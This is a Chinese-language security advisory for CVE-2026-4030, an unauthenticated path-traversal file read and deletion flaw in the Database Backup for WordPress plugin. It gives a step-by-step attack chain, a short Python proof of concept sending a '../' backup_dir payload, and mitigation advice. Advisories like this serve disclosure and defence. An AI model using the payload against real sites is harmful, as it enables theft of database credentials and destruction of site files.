CVE-2026-4030 CVSS 8.1 高危

CVE-2026-4030 WordPress数据库备份插件任意文件读取删除漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4030

漏洞类型

任意文件读取与删除

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Database Backup for WordPress

漏洞概述

WordPress的Database Backup插件在2.5.2及之前版本中存在严重的安全漏洞。由于插件未能正确强制执行授权检查的返回值，且结合了用户可控的备份目录参数，导致未经身份验证的攻击者可以在WordPress多站点环境中读取和删除服务器上的任意文件。该漏洞可能导致敏感信息泄露，甚至完全接管网站。此漏洞仅在使用了已弃用的is_site_admin()函数的多站点环境中可被利用。

技术细节

该漏洞的核心在于插件对权限验证逻辑的处理不当。在受影响的版本中，插件使用了WordPress的is_site_admin()函数（已弃用）来检查用户权限，但代码逻辑错误地处理了该函数的返回值。攻击者可以通过构造特定的请求，利用用户可控的备份目录参数（backup_dir）来指定服务器上的任意路径。由于授权检查被绕过，攻击者无需登录即可发起请求。通过操纵备份目录参数，攻击者可以遍历服务器文件系统，读取敏感配置文件（如wp-config.php）或删除关键文件。这种未授权的文件操作能力结合WordPress多站点环境的特性，使得攻击者能够获取数据库凭证或破坏站点结构，从而实现进一步的攻击。

攻击链分析

STEP 1

信息侦察

攻击者识别目标是WordPress多站点环境，并确认安装了Database Backup for WordPress插件且版本低于2.5.3。

STEP 2

构造攻击载荷

攻击者构造包含恶意backup_dir参数的HTTP请求，该参数包含路径遍历字符（如../）以指向敏感文件（如/etc/passwd或wp-config.php）。

STEP 3

发送恶意请求

攻击者向插件接口发送未经身份验证的请求。由于is_site_admin()返回值检查缺陷，权限验证被绕过。

STEP 4

文件读取与删除

服务器端根据恶意参数执行文件操作，导致敏感文件内容被回显或关键文件被删除。

STEP 5

建立立足点

利用读取到的数据库凭据进一步入侵数据库，或通过删除核心文件导致拒绝服务，最终可能完全接管站点。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Database Backup for WordPress < 2.5.2 - Unauthenticated Arbitrary File Read/Deletion
# Vulnerable Endpoint: wp-db-backup.php

target_url = "http://target-wordpress-site.com"

# The exploit leverages the 'backup_dir' parameter which is not properly sanitized
# and bypasses authorization checks in Multisite environments.
payload = {
    "backup_dir": "../../../../../",  # Traversal path to root or specific target
    "step": "2",
    "do_backup": "backup"
}

try:
    # Sending unauthenticated request
    response = requests.get(f"{target_url}/wp-admin/admin.php?page=wp-db-backup", params=payload)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check response for file listing or deletion confirmation.")
        print(response.text[:500]) # Print snippet of response
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

Database Backup for WordPress <= 2.5.2

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Database Backup插件以阻断攻击路径。对于必须使用该插件的环境，应检查代码中关于is_site_admin()的使用情况，或通过服务器配置（如.htaccess或Nginx规则）限制对该插件页面的外部访问，仅允许受信任的IP地址访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表